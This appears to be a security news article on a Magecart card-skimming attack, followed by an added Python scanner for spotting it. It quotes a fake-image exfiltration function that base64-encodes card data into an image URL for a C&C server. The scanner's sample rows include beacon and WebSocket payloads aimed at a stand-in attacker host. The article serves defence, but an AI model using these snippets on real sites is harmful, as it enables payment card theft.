The notorious Magecart group has been identified by the Yarix Incident Response Team as the culprits behind a recent credit card data theft operation on an e-commerce platform.
This latest assault on consumer data showcases the group’s evolving tactics to infiltrate and compromise online payment systems.

Initial Access and Web Shell Deployment
The attack began with Magecart utilising stolen credentials, likely harvested through an infostealer malware, to gain initial access to the website’s backend.
Once access was secured, the attackers uploaded a malicious PHP script to the server, which functioned as a web shell.
This web shell, based on the structure of the open-source P.A.S. Fork v. 1.4, provided them with complete remote control over the server, enabling persistent access and the ability to execute commands without regular user interaction.
Further investigation revealed that Magecart had infiltrated the site’s database, polluting it with hidden, malicious JavaScript code.

This code, disguised within a seemingly innocuous <img> tag, was designed to activate whenever certain pages were loaded, performing background operations like data exfiltration without user knowledge.
The script was embedded in a way that ensured its execution even if the initial access method was compromised, showcasing a deep level of persistence in their attack strategy.
Exfiltration Methods: WebSocket Connection and Fake Images
The data exfiltration was ingeniously executed through two primary methods:
- WebSocket Connection: A function named “createWebSocket” was employed to establish a WebSocket connection with the attackers’ command-and-control (C&C) server. This connection allowed real-time, bidirectional communication for sending stolen data in a manner that was difficult to detect, because the channel was encrypted and the connection parameters changed dynamically.

```javascript
function createWebSocket() {
    // ... WebSocket setup and data exchange logic (elided in the report)
}
```

- Fake Images: Additionally, a technique known as “fake image” exfiltration was used, where user data, including email, addresses and credit card details, was encoded into URLs and set as the source of image objects. These objects would then make requests to the attackers’ server, appearing as legitimate image downloads but in reality serving as covert data channels.

```javascript
function createImage(dataToImg) {
    var objImage = new Image();
    // The stolen data is base64-encoded into the query string, so the request
    // looks like an ordinary image load but carries the payload to the C&C server
    objImage.src = "//C&C server URL//?data=" + window.btoa(dataToImg);
}
```
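As an added illustration (not code from the Yarix report or the attackers), the following scanner can be run over exported CMS/database rows or rendered page bodies to flag the three patterns described above: an `<img>` tag that carries an inline event handler, an image beacon whose `src` is built from `btoa()`, and a WebSocket opened to a host outside the site’s own. The `ALLOWED_HOSTS` set and the sample rows are constructed assumptions.

```python
"""Scan stored CMS/DB content for the exfiltration patterns described above."""
import re
from urllib.parse import urlparse

# Hosts this site legitimately talks to (assumption: adapt to your own site).
ALLOWED_HOSTS = {"shop.example", "cdn.example"}

# <img ...> tags that carry an inline event handler: stored "image" markup
# that actually runs JavaScript when the page loads.
IMG_WITH_HANDLER = re.compile(r"<img\b[^>]*\bon(?:error|load)\s*=", re.I)
# Image-beacon exfiltration: an Image object whose src is built from btoa().
IMAGE_BEACON = re.compile(r"new\s+Image\s*\(.*?\.src\s*=.*?btoa\s*\(", re.I | re.S)
# Any WebSocket opened to a literal ws:// or wss:// URL.
WEBSOCKET_URL = re.compile(r"new\s+WebSocket\s*\(\s*[\"'](wss?://[^\"']+)", re.I)


def scan_content(text: str) -> list[str]:
    """Return a list of finding labels for one stored row or page body."""
    findings = []
    if IMG_WITH_HANDLER.search(text):
        findings.append("img-tag-with-inline-handler")
    if IMAGE_BEACON.search(text):
        findings.append("image-beacon-btoa-exfil")
    for m in WEBSOCKET_URL.finditer(text):
        host = urlparse(m.group(1)).hostname or ""
        if host not in ALLOWED_HOSTS:
            findings.append(f"websocket-to-offsite-host:{host}")
    return findings


# Constructed sample rows (not from the incident): a benign product image,
# an <img> whose onerror handler builds a btoa() image beacon, and a snippet
# that opens a WebSocket to an off-site host.
SAMPLE_ROWS = {
    "benign": '<img src="/media/shoe.jpg" alt="Running shoe">',
    "beacon": '<img src="x" onerror="var i=new Image();i.src=\'//attacker.invalid/?data=\'+window.btoa(d)">',
    "socket": '<script>var ws=new WebSocket("wss://attacker.invalid/ws");</script>',
}

if __name__ == "__main__":
    for name, row in SAMPLE_ROWS.items():
        print(name, scan_content(row))
```

Regex matching is a triage aid, not a parser: review flagged rows by hand and extend the patterns to whatever your own audit of the stored content turns up.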
Magecart’s latest attack highlights the critical need for enhanced security measures in the face of evolving cyber threats.
Recommendations include strengthening password policies, implementing two-factor authentication, and ensuring all software is up-to-date.
Moreover, regular code audits, employing advanced XDR (Extended Detection and Response) systems, and installing web application firewalls are advised to detect and mitigate such attacks promptly.
This incident serves as a stark reminder of the persistent and adaptive nature of cybercriminals, urging a proactive approach to cybersecurity in the e-commerce sector.